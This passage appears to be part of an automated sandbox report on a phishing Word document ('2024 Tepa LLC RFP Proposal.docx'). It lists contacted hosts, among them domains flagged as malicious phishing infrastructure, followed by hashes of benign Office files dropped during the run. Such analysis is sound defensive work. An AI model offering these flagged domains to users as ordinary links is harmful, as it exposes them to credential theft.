                                                      nw2iycgst5mfz3kmc6onhudkkvl7u1mxoob5ixnhoc7c0jiwqzqza.lpliwptf.ruUnited States
                                                      13335CLOUDFLARENETUSfalse
                                                      104.18.95.41
                                                      challenges.cloudflare.comUnited States
                                                      13335CLOUDFLARENETUSfalse
                                                      151.101.2.137
                                                      code.jquery.comUnited States
                                                      54113FASTLYUSfalse
                                                      239.255.255.250
                                                      unknownReserved
                                                      unknownunknownfalse
                                                      52.109.28.46
                                                      unknownUnited States
                                                      8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                      172.67.199.137
                                                      wla3.ensfulthal.comUnited States
                                                      13335CLOUDFLARENETUStrue
                                                      142.250.181.36
                                                      www.google.comUnited States
                                                      15169GOOGLEUSfalse
                                                      108.158.75.129
                                                      d28140lin2gosl.cloudfront.netUnited States
                                                      16509AMAZON-02USfalse
                                                      52.98.200.210
                                                      MRS-efz.ms-acdc.office.comUnited States
                                                      8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                      142.250.181.99
                                                      unknownUnited States
                                                      15169GOOGLEUSfalse
                                                      173.194.222.84
                                                      unknownUnited States
                                                      15169GOOGLEUSfalse
                                                      142.250.181.10
                                                      unknownUnited States
                                                      15169GOOGLEUSfalse
                                                      104.17.25.14
                                                      cdnjs.cloudflare.comUnited States
                                                      13335CLOUDFLARENETUSfalse
                                                      IP
                                                      192.168.2.18
                                                      192.168.2.4
                                                      Joe Sandbox version:41.0.0 Charoite
                                                      Analysis ID:1573952
                                                      Start date and time:2024-12-12 18:35:19 +01:00
                                                      Joe Sandbox product:CloudBasic
                                                      Overall analysis duration:
                                                      Hypervisor based Inspection enabled:false
                                                      Report type:full
                                                      Cookbook file name:defaultwindowsinteractivecookbook.jbs
                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                      Number of analysed new started processes analysed:15
                                                      Number of new started drivers analysed:0
                                                      Number of existing processes analysed:0
                                                      Number of existing drivers analysed:0
                                                      Number of injected processes analysed:0
                                                      Technologies:
                                                      • EGA enabled
                                                      Analysis Mode:stream
                                                      Analysis stop reason:Timeout
                                                      Sample name:2024 Tepa LLC RFP Proposal.docx
                                                      Detection:MAL
                                                      Classification:mal52.phis.winDOCX@21/245@55/261
                                                      Cookbook Comments:
                                                      • Found application associated with file extension: .docx
                                                      • Exclude process from analysis (whitelisted): dllhost.exe
                                                      • Excluded IPs from analysis (whitelisted): 23.218.208.109
                                                      • Excluded domains from analysis (whitelisted): fs.microsoft.com, e16604.g.akamaiedge.net, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net
                                                      • Not all processes where analyzed, report is missing behavior information
                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                      • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                      • Report size getting too big, too many NtSetInformationFile calls found.
                                                      • VT rate limit hit for: 2024 Tepa LLC RFP Proposal.docx
                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                      File Type:XML 1.0 document, ASCII text, with very long lines (1869), with no line terminators
                                                      Category:modified
                                                      Size (bytes):1869
                                                      Entropy (8bit):5.087360615993415
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:9B11931EBA646551C02A9A4378D471F1
                                                      SHA1:F4D416D8833B24599AF7DBC20189AA80BCEF6C8A
                                                      SHA-256:A2FC154558EE1F32D706F1FDF1D97F1B55A72BF278209CEEBCB1C548435F6BCF
                                                      SHA-512:F8DD8D22B143C134265ADF3D854F706404162A4F1018B578B459B0D616E950754EE6E609B8876A682449DB0B82D687BE0510CBF30784CA07EC1DB05B35A0A2C1
                                                      Malicious:false
                                                      Reputation:unknown
                                                      Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?><root><version>1</version><Count>12</Count><Resource><Id>Aptos Narrow_26215424</Id><LAT>2023-10-06T10:24:51Z</LAT><key>31558910439.ttf</key><folder>Aptos Narrow</folder><type>4</type></Resource><Resource><Id>Aptos_45876480</Id><LAT>2024-12-12T17:35:59Z</LAT><key>27160079615.ttf</key><folder>Aptos</folder><type>4</type></Resource><Resource><Id>Aptos Display_26215680</Id><LAT>2024-12-12T17:35:59Z</LAT><key>23001069669.ttf</key><folder>Aptos Display</folder><type>4</type></Resource><Resource><Id>Aptos Display_45876482</Id><LAT>2023-10-06T10:24:51Z</LAT><key>29442803203.ttf</key><folder>Aptos Display</folder><type>4</type></Resource><Resource><Id>Aptos Display_45876480</Id><LAT>2023-10-06T10:24:51Z</LAT><key>30264859306.ttf</key><folder>Aptos Display</folder><type>4</type></Resource><Resource><Id>Aptos Narrow_45876224</Id><LAT>2023-10-06T10:24:51Z</LAT><key>24153076628.ttf</key><folder>Aptos Narrow</folder><type>4</type></Resource><Res
                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                      File Type:JSON data
                                                      Category:dropped
                                                      Size (bytes):521377
                                                      Entropy (8bit):4.9084889265453135
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:C37972CBD8748E2CA6DA205839B16444
                                                      SHA1:9834B46ACF560146DD7EE9086DB6019FBAC13B4E
                                                      SHA-256:D4CFBB0E8B9D3E36ECE921B9B51BD37EF1D3195A9CFA1C4586AEA200EB3434A7
                                                      SHA-512:02B4D134F84122B6EE9A304D79745A003E71803C354FB01BAF986BD15E3BA57BA5EF167CC444ED67B9BA5964FF5922C50E2E92A8A09862059852ECD9CEF1A900
                                                      Malicious:false
                                                      Reputation:unknown
                                                      Preview:{"MajorVersion":4,"MinorVersion":40,"Expiration":14,"Fonts":[{"a":[4294966911],"f":"Abadi","fam":[],"sf":[{"c":[1,0],"dn":"Abadi","fs":32696,"ful":[{"lcp":983041,"lsc":"Latn","ltx":"Abadi"}],"gn":"Abadi","id":"23643452060","p":[2,11,6,4,2,1,4,2,2,4],"sub":[],"t":"ttf","u":[2147483651,0,0,0],"v":197263,"w":26215680},{"c":[1,0],"dn":"Abadi Extra Light","fs":22180,"ful":[{"lcp":983042,"lsc":"Latn","ltx":"Abadi Extra Light"}],"gn":"Abadi Extra Light","id":"17656736728","p":[2,11,2,4,2,1,4,2,2,4],"sub":[],"t":"ttf","u":[2147483651,0,0,0],"v":197263,"w":13108480}]},{"a":[4294966911],"f":"ADLaM Display","fam":[],"sf":[{"c":[536870913,0],"dn":"ADLaM Display Regular","fs":140072,"ful":[{"lcp":983040,"lsc":"Latn","ltx":"ADLaM Display"}],"gn":"ADLaM Display","id":"31965479471","p":[2,1,0,0,0,0,0,0,0,0],"sub":[],"t":"ttf","u":[2147491951,1107296330,0,0],"v":131072,"w":26215680}]},{"a":[4294966911],"f":"Agency FB","fam":[],"sf":[{"c":[536870913,0],"dn":"Agency FB Bold","fs":54372,"ful":[{"lcp":9830
                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                      File Type:TrueType Font data, 10 tables, 1st "OS/2", 7 names, Microsoft, language 0x409, \251 2018 Microsoft Corporation. All Rights Reserved.msofp_4_40RegularVersion 4.40;O365
                                                      Category:dropped
                                                      Size (bytes):773040
                                                      Entropy (8bit):6.55939673749297
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:4296A064B917926682E7EED650D4A745
                                                      SHA1:3953A6AA9100F652A6CA533C2E05895E52343718
                                                      SHA-256:E04E41C74D6C78213BA1588BACEE64B42C0EDECE85224C474A714F39960D8083
                                                      SHA-512:A25388DDCE58D9F06716C0F0BDF2AEFA7F68EBCA7171077533AF4A9BE99A08E3DCD8DFE1A278B7AA5DE65DA9F32501B4B0B0ECAB51F9AF0F12A3A8A75363FF2C
                                                      Malicious:false
                                                      Reputation:unknown
                                                      Preview:........... OS/29....(...`cmap.s.,.......pglyf..&....|....head2..........6hheaE.@v.......$hmtx...........@loca.U.....8...Dmaxp........... name.P+........post...<...... .........b~1_.<...........<......r......Aa...................Q....Aa....Aa.........................~...................................................3..............................MS .@.......(...Q................. ...........d...........0...J.......8.......>..........+a..#...,................................................/...K.......z...............N......*...!...-...+........z.......h..%^..3...&j..+...+%..'R..+..."....................k......$A...,.......g...&...=.......X..&........*......&....B..(B...............#.......j...............+...P...5...@...)..........#...)Q...............*...{.. ....?..'...#....N...7......<...;>.............. ]...........5......#....s.......$.......$.......^..................+...>....H.......%...7.......6.......O...V...........K......"........c...N......!...............$...&...*p..
                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):256
                                                      Entropy (8bit):3.464918006641019
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:93149E194021B37162FD86684ED22401
                                                      SHA1:1B31CAEBE1BBFA529092BE834D3B4AD315A6F8F1
                                                      SHA-256:50BE99A154A6F632D49B04FCEE6BCA4D6B3B4B7C1377A31CE9FB45C462D697B2
                                                      SHA-512:410A7295D470EC85015720B2B4AC592A472ED70A04103D200FA6874BEA6A423AF24766E98E5ACAA3A1DBC32C44E8790E25D4611CD6C0DBFFFE8219D53F33ACA7
                                                      Malicious:false
                                                      Reputation:unknown
                                                      Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .E.q.u.a.t.i.o.n.s...d.o.t.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.W.D. .D.o.c.u.m.e.n.t. .P.a.r.t.s.}.........
                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                      File Type:Microsoft Word 2007+
                                                      Category:dropped
                                                      Size (bytes):51826
                                                      Entropy (8bit):5.541375256745271
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:2AB22AC99ACFA8A82742E774323C0DBD
                                                      SHA1:790F8B56DF79641E83A16E443A75A66E6AA2F244
                                                      SHA-256:BC9D45D0419A08840093B0BF4DCF96264C02DFE5BD295CD9B53722E1DA02929D
                                                      SHA-512:E5715C0ECF35CE250968BD6DE5744D28A9F57D20FD6866E2AF0B2D8C8F80FEDC741D48F554397D61C5E702DA896BD33EED92D778DBAC71E2E98DCFB0912DE07B
                                                      Malicious:false
                                                      Reputation:unknown
                                                      Preview:PK.........R.@c}LN4...........[Content_Types].xml ...(.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c.....D....>.V...f-}..r9....=..Mn..U..5.(.....a...E..b....*..w.$...,O_fu."[P..WU=.;.....5..wdt..y1.......i.44-.r....;./.biG.Cd.n.j.{/......V....c..^^.E.H?H.........B.........<...Ae.l.]..{....mK......B....
                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):374
                                                      Entropy (8bit):3.5414485333689694
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:2F7A8FE4E5046175500AFFA228F99576
                                                      SHA1:8A3DE74981D7917E6CE1198A3C8E35C7E2100F43
                                                      SHA-256:1495B4EC56B371148EA195D790562E5621FDBF163CDD8A5F3C119F8CA3BD2363
                                                      SHA-512:4B8FBB692D91D88B584E46C2F01BDE0C05DCD5D2FF073D83331586FB3D201EACD777D48DB3751E534E22115AA1C3C30392D0D642B3122F21EF10E3EE6EA3BE82
                                                      Malicious:false
                                                      Reputation:unknown
                                                      Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .T.e.x.t. .S.i.d.e.b.a.r. .(.A.n.n.u.a.l. .R.e.p.o.r.t. .R.e.d. .a.n.d. .B.l.a.c.k. .d.e.s.i.g.n.)...d.o.c.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. ./.f. .{.F.i.l.e.P.a.t.h.}.........
                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                      File Type:Microsoft Word 2007+
                                                      Category:dropped
                                                      Size (bytes):47296
                                                      Entropy (8bit):6.42327948041841
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:5A53F55DD7DA8F10A8C0E711F548B335
                                                      SHA1:035E685927DA2FECB88DE9CAF0BECEC88BC118A7
                                                      SHA-256:66501B659614227584DA04B64F44309544355E3582F59DBCA3C9463F67B7E303
                                                      SHA-512:095BD5D1ACA2A0CA3430DE2F005E1D576AC9387E096D32D556E4348F02F4D658D0E22F2FC4AA5BF6C07437E6A6230D2ABF73BBD1A0344D73B864BC4813D60861
                                                      Malicious:false
                                                      Reputation:unknown
                                                      Preview:PK........<dSA4...T...P.......[Content_Types].xml ...(........................................................................................................................................................................................................................................................................................................................................................................................................................................`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c...W..G.4D_.}T,.@...}....R.Z..4k.....Y..mEkLor.f^..O..P...`..^\-o..D....n_d.jq...gwg.t........:?/..}..Vu5...rQ..7..X.Q."./g..o....f....YB......<..w?...ss..e.4Y}}...0.Y...........u3V.o..r...5....7bA..Us.z.`.r(.Y>.&DVy.........6.T...e.|..g.%<...9a.&...7...}3:B.......<...!...:..7w...y..
                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):252
                                                      Entropy (8bit):3.48087342759872
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:69757AF3677EA8D80A2FBE44DEE7B9E4
                                                      SHA1:26AF5881B48F0CB81F194D1D96E3658F8763467C
                                                      SHA-256:0F14CA656CDD95CAB385F9B722580DDE2F46F8622E17A63F4534072D86DF97C3
                                                      SHA-512:BDA862300BAFC407D662872F0BFB5A7F2F72FE1B7341C1439A22A70098FA50C81D450144E757087778396496777410ADCE4B11B655455BEDC3D128B80CFB472A
                                                      Malicious:false
                                                      Reputation:unknown
                                                      Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .P.i.c.t.u.r.e.F.r.a.m.e...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........
                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                      File Type:Microsoft OOXML
                                                      Category:dropped
                                                      Size (bytes):4326
                                                      Entropy (8bit):7.821066198539098
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:D32E93F7782B21785424AE2BEA62B387
                                                      SHA1:1D5589155C319E28383BC01ED722D4C2A05EF593
                                                      SHA-256:2DC7E71759D84EF8BB23F11981E2C2044626FEA659383E4B9922FE5891F5F478
                                                      SHA-512:5B07D6764A6616A7EF25B81AB4BD4601ECEC1078727BFEAB4A780032AD31B1B26C7A2306E0DBB5B39FC6E03A3FC18AD67C170EA9790E82D8A6CEAB8E7F564447
                                                      Malicious:false
                                                      Reputation:unknown
                                                      Preview:PK.........n.A...#............docProps/thumbnail.jpgz.........{4.i....1.n.v)..#.\*....A+..Q(."..D.......#Q)...SQ....2c.ei.JC...N.{......}.s.s..y>....d.(:.;.....q........$.OBaPbI..(.V...o.....'..b..edE.J.+.....".tq..dqX.......8...CA.@..........0.G.O.$Ph...%i.Q.CQ.>.%!j..F..."?@.1J.Lm$..`..*oO...}..6......(%....^CO..p......-,.....w8..t.k.#....d..'...O...8....s1....z.r...rr...,(.)...*.]Q]S.{X.SC{GgWw..O....X./FF9._&..L.....[z..^..*....C...qI.f... .Hq....d*.d..9.N{{.N.6..6)..n<...iU]3.._.....%./.?......(H4<.....}..%..Z..s...C@.d>.v...e.'WGW.....J..:....`....n..6.....]W~/.JX.Qf..^...}...._Sg.-.p..a..C_:..F..E.....k.H..........-Bl$._5...B.w2e...2...c2/y3.U...7.8[.S}H..r/..^...g...|...l..\M..8p$]..poX-/.2}..}z\.|.d<T.....1....2...{P...+Y...T...!............p..c.....D..o..%.d.f.~.;.;=4.J..]1"("`......d.0.....L.f0.l..r8..M....m,.p..Y.f....\2.q. ...d9q....P...K..o!..#o...=.........{.p..l.n...........&..o...!J..|)..q4.Z.b..PP....U.K..|.i.$v
                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):260
                                                      Entropy (8bit):3.494357416502254
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:6F8FE7B05855C203F6DEC5C31885DD08
                                                      SHA1:9CC27D17B654C6205284DECA3278DA0DD0153AFF
                                                      SHA-256:B7F58DF058C938CCF39054B31472DC76E18A3764B78B414088A261E440870175
                                                      SHA-512:C518A243E51CB4A1E3C227F6A8A8D9532EE111D5A1C86EBBB23BD4328D92CD6A0587DF65B3B40A0BE2576D8755686D2A3A55E10444D5BB09FC4E0194DB70AFE6
                                                      Malicious:false
                                                      Reputation:unknown
                                                      Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .T.h.e.m.e.P.i.c.t.u.r.e.G.r.i.d...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........
                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                      Category:dropped
                                                      Size (bytes):6193
                                                      Entropy (8bit):7.855499268199703
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:031C246FFE0E2B623BBBD231E414E0D2
                                                      SHA1:A57CA6134779D54691A4EFD344BC6948E253E0BA
                                                      SHA-256:2D76C8D1D59EDB40D1FBBC6406A06577400582D1659A544269500479B6753CF7
                                                      SHA-512:6A784C28E12C3740300883A0E690F560072A3EA8199977CBD7F260A21E8346B82BA8A4F78394D3BB53FA2E98564B764C2D0232C40B25FB6085C36D20D70A39D1
                                                      Malicious:false
                                                      Reputation:unknown
                                                      Preview:PK........X..<..Zn|...........diagrams/layout1.xmlz........]..H.}......M,l#g.j:.G-eu.*S=.$......T_6..I...6...d.NJ....r.p.p.........|.z.K.M..L.T.(........<..ks.......o...t}...P..*.7...`.+.[...H..._..X.u.....N....n....n|..=.....K.:.G7.u....."g.n.h...O.,...c...f.b.P......>[l.....j.*.?..mxk..n..|A...,\o..j..wQ.....lw.~].Lh..{3Y..D..5.Y..n..Mh.r..J....6*.<.kO...Alv.._.qdKQ.5...-FMN......;.~..._..pv..&...%"Nz].n............vM.`..k..a.:.f]...a........y.....g0..`........|V...Yq.....#...8....n..i7w<2Rp...R.@.]..%.b%..~...a..<.j...&....?...Qp..Ow|&4>...d.O.|.|...Fk;t.P[A..i.6K.~...Y.N..9......~<Q..f...i.....6..U...l. ..E..4$Lw..p..Y%NR..;...B|B.U...\e......S...=...B{A.]..*....5Q.....FI..w....q.s{.K....(.]...HJ9........(.....[U|.....d71.Vv.....a.8...L.....k;1%.T.@+..uv.~v.]`.V....Z.....`.M.@..Z|.r........./C..Z.n0.....@.YQ.8..q.h.....c.%...p..<..zl.c..FS.D..fY..z..=O..%L..MU..c.:.~.....F]c......5.=.8.r...0....Y.\o.o....U.~n...`...Wk..2b......I~
                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):290
                                                      Entropy (8bit):3.5081874837369886
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:8D9B02CC69FA40564E6C781A9CC9E626
                                                      SHA1:352469A1ABB8DA1DC550D7E27924E552B0D39204
                                                      SHA-256:1D4483830710EF4A2CC173C3514A9F4B0ACA6C44DB22729B7BE074D18C625BAE
                                                      SHA-512:8B7DB2AB339DD8085104855F847C48970C2DD32ADB0B8EEA134A64C5CC7DE772615F85D057F4357703B65166C8CF0C06F4F6FD3E60FFC80DA3DD34B16D5B1281
                                                      Malicious:false
                                                      Reputation:unknown
                                                      Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .g.o.s.t.n.a.m.e...x.s.l.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. ./.f. .{.F.i.l.e.P.a.t.h.}.........
                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):255948
                                                      Entropy (8bit):5.103631650117028
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:9888A214D362470A6189DEFF775BE139
                                                      SHA1:32B552EB3C73CD7D0D9D924C96B27A86753E0F97
                                                      SHA-256:C64ED5C2A323C00E84272AD3A701CAEBE1DCCEB67231978DE978042F09635FA7
                                                      SHA-512:8A75FC2713003FA40B9730D29C786C76A796F30E6ACE12064468DD2BB4BF97EF26AC43FFE1158AB1DB06FF715D2E6CDE8EF3E8B7C49AA1341603CE122F311073
                                                      Malicious:false
                                                      Reputation:unknown
                                                      Preview:<?xml version="1.0" encoding="utf-8"?>............<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>..........<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select=
                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):314
                                                      Entropy (8bit):3.5230842510951934
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:F25AC64EC63FA98D9E37782E2E49D6E6
                                                      SHA1:97DD9CFA4A22F5B87F2B53EFA37332A9EF218204
                                                      SHA-256:834046A829D1EA836131B470884905856DBF2C3C136C98ADEEFA0F206F38F8AB
                                                      SHA-512:A0387239CDE98BCDE1668B582B046619C3B3505F9440343DAD22B1B7B9E05F3B74F2AE29E591EC37B6570A0C0E5FE571442873594B0684DDCCB4F6A1B5E10B1F
                                                      Malicious:false
                                                      Reputation:unknown
                                                      Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .i.e.e.e.2.0.0.6.o.f.f.i.c.e.o.n.l.i.n.e...x.s.l.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. ./.f. .{.F.i.l.e.P.a.t.h.}.........
                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                      File Type:XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):294178
                                                      Entropy (8bit):4.977758311135714
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:0C9731C90DD24ED5CA6AE283741078D0
                                                      SHA1:BDD3D7E5B0DE9240805EA53EF2EB784A4A121064
                                                      SHA-256:ABCE25D1EB3E70742EC278F35E4157EDB1D457A7F9D002AC658AAA6EA4E4DCDF
                                                      SHA-512:A39E6201D6B34F37C686D9BD144DDD38AE212EDA26E3B81B06F1776891A90D84B65F2ABC5B8F546A7EFF3A62D35E432AF0254E2F5BFE4AA3E0CF9530D25949C0
                                                      Malicious:false
                                                      Reputation:unknown
                                                      Preview:<?xml version="1.0" encoding="utf-8"?>....<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt"......xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">.....<xsl:output method="html" encoding="us-ascii"/>.....<xsl:template match="/">....<xsl:call-template name="Start"/>...</xsl:template>.....<xsl:template name="Start">....<xsl:choose>.....<xsl:when test="b:Version">......<xsl:text>2010.2.02</xsl:text>.....</xsl:when>.......<xsl:when test="b:XslVersion">......<xsl:text>2006</xsl:text>.....</xsl:when>.. <xsl:when test="b:StyleNameLocalized">.. <xsl:choose>.. <xsl:when test="b:StyleNameLocalized/b:Lcid='1033'">.. <xsl:text>IEEE</xsl:text>.. </xsl:when>.. <xsl:when test="b:StyleNameLocalized/b:Lcid='1025'">.. <xsl:text>IEEE</xsl:text>.. </xsl:when>.. <xsl:when test="b:StyleNameL
                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):290
                                                      Entropy (8bit):3.5161159456784024
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:C15EB3F4306EBF75D1E7C3C9382DEECC
                                                      SHA1:A3F9684794FFD59151A80F97770D4A79F1D030A6
                                                      SHA-256:23C262DF3AEACB125E88C8FFB7DBF56FD23F66E0D476AFD842A68DDE69658C7F
                                                      SHA-512:ACDF7D69A815C42223FD6300179A991A379F7166EFAABEE41A3995FB2030CD41D8BCD46B566B56D1DFBAE8557AFA1D9FD55143900A506FA733DE9DA5D73389D6
                                                      Malicious:false
                                                      Reputation:unknown
                                                      Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .t.u.r.a.b.i.a.n...x.s.l.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. ./.f. .{.F.i.l.e.P.a.t.h.}.........
                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):344303
                                                      Entropy (8bit):5.023195898304535
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:F079EC5E2CCB9CD4529673BCDFB90486
                                                      SHA1:FBA6696E6FA918F52997193168867DD3AEBE1AD6
                                                      SHA-256:3B651258F4D0EE1BFFC7FB189250DED1B920475D1682370D6685769E3A9346DB
                                                      SHA-512:4FFFA59863F94B3778F321DA16C43B92A3053E024BDD8C5317077EA1ECC7B09F67ECE3C377DB693F3432BF1E2D947EC5BF8E88E19157ED08632537D8437C87D6
                                                      Malicious:false
                                                      Reputation:unknown
                                                      Preview:<?xml version="1.0" encoding="utf-8"?>......<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>............<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$pa
                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):260
                                                      Entropy (8bit):3.4895685222798054
                                                      Encrypted:false
                                                      SSDEEP:
